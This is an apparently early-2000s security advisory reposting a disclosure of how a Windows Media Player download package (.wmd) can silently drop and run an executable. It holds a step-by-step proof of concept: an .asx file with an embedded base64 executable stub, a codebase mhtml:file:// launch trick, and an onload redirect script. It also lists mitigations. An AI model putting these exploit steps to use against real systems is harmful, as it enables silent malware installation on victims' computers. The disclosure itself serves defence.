COMMAND

	
		Windows MP silent delivery and installation  of  an  executable  on  the
		target computer
	
	

SYSTEMS AFFECTED

	
		All ?
	
	

PROBLEM

	
		http-equiv [http-equiv@malware.com] [http://www.malware.com] revealed :
		

		This is truly  terrible.  In  addition  to  server  side  '404  errors',
		cookies and who knows what else [perhaps user.dat, index.dat,  even  the
		old  inbox.mbx],  the  Windows  Media  Player  appears  to  be  severely
		affected by Jelmer codebase too.
		

		Combing the Jelmer codebase, the Sandblad dot bug and  the  1  year  old
		wimpy'flication       of       the       media       player        [see:
		http://www.malware.com/wimpy.html]
		

		1. Create an *.asx meta file as follows:
		

		<ASX version="3">

		<Entry>

		<ref HREF="cluster.asf"/>

		</Entry></ASX>

		MIME-Version: 1.0

		Content-Location:file:///malware.exe

		Content-Transfer-Encoding: base64

		

		TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA

		AAAAAA

		

		

		 <applet CLASSID="CLSID:55555555-5555" 

		codebase="mhtml:file:///C:\My Documents\My Music\Virtual 

		Albums\malware\f ck.asx!file:///malware.exe">

		

		2. Create an *.asf file with URL flip as follows:
		

		url: cluster.html
		

		<body onload=malware()>

		 <script>

		function malware(){

		alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%

		5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")

		 }

		  </script>

		

		3. Create a *.wmd file comprising 1 and 2 above.
		

		What happens?
		

		Ordinarily the Windows Media Download Package  file  [*.wmd]  creates  a
		folder with the given name of the *.wmd file --  e.g.  malware.wmd  will
		create a folder called malware in the default location  for  so-  called
		"Virtual  Music"  --   specifically:   My   Documents\My   Music\Virtual
		Albums\malware,  security  measures  currently   incorporated   in   the
		extraction of the contents of the *.wmd do  a  reasonably  good  job  of
		ensuring that files contained within the Download Package, are  in  fact
		valid files.
		

		A reasonably good job.
		

		We find that the bare minimum for the *.asx meta file must  include  the
		following:
		

		<ASX><Entry><ref HREF=''/></ASX> 

		

		with these tags the Media Player will  indeed  extract  the  *.asx  file
		into our known folder.
		

		So how do we make use of that?
		

		Simple: 1,2,3 above, buckle your shoe.
		

		 Working Example:

		 ===============

		

		[hard coded for win98, trivial tweaking for others - harmless *.exe]

		http://www.malware.com/malware.php

		

		 Important Notes:

		 ===============

		

		 1. Suggestions have been made that in this particular instance, the 

		    dot bug is not necessary.

		 2. Suggestions have been made that the 'open'  "object" hole of 

		    http://online.securityfocus.com/bid/5196 will work just as well

		 3. Disable Active Scripting

		 4. Disable Media Download [if you can]

		 5. Change the default location of "My Music..."

		 5. Hopefully this will all be a bad memory once all the patches. 

		    packs, whatever are finally released.

		 6. Forget about the 'glitzy' advertising. Think long and hard about 

		    the products you install 

		

		

		 Pathetic Notes:

		 ==============

		

		 A.

		

		  1. The codebase 'vulnerability' is over 2 years old. Demonstrated in 

		     a different form and mentioned in its current form in June 2000 

		

		  2. Resurrected in fine fashion at the end of 2001 by the Pull with 

		     many others demonstrating similar thereafter

		

		  3. Added to in splendid fashion by Jelmer in July 2002 with key 

		     protocol

		

		

		 B. The dot bug by Sandblad of May 2002, patched, not patched, fully 

		 functional to date. With patch and without patch. Not even actually 

		 required in this instance.

		

		 C. The malware *.asx meta file and packable transportable  *.wmd of 

		 June 2001.
	
	

SOLUTION